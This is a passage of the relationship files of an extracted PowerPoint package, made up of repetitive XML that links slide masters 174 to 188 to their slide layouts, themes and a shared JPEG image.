Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1730.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1721.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster174.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1739.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1738.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1737.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1736.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1735.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1734.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1733.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1732.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme174.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1740.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1731.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster175.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1749.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1748.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1747.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1746.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1745.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1744.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1743.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1742.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme175.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1750.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1741.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster176.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1759.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1758.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1757.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1756.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1755.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1754.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1753.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1752.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme176.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1760.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1751.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster177.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1769.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1768.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1767.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1766.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1765.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1764.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1763.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1762.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme177.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1770.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1761.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster178.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1779.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1778.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1777.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1776.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1775.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1774.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1773.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1772.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme178.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1780.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1771.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster179.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1789.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1788.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1787.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1786.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1785.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1784.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1783.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1782.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme179.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1790.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1781.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster18.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout179.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout178.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout177.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout176.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout175.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout174.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout173.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout172.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme18.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout180.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout171.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster180.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1799.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1798.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1797.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1796.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1795.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1794.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1793.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1792.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme180.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1800.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1791.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster181.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1809.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1808.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1807.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1806.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1805.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1804.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1803.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1802.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme181.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1810.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1801.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster182.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1819.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1818.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1817.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1816.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1815.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1814.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1813.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1812.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme182.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1820.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1811.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster183.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1829.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1828.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1827.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1826.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1825.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1824.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1823.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1822.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme183.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1830.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1821.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster184.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1839.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1838.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1837.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1836.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1835.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1834.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1833.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1832.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme184.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1840.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1831.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster185.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1849.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1848.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1847.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1846.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1845.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1844.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1843.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1842.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme185.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1850.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1841.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster186.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1859.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1858.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1857.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1856.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1855.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1854.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1853.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1852.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme186.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1860.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1851.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster187.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1869.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1868.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1867.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1866.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1865.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1864.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1863.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1862.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme187.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1870.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1861.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster188.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1879.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1878.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1877.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1876.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1875.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1874.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1873.xml"/><Relationship Id="rId2" 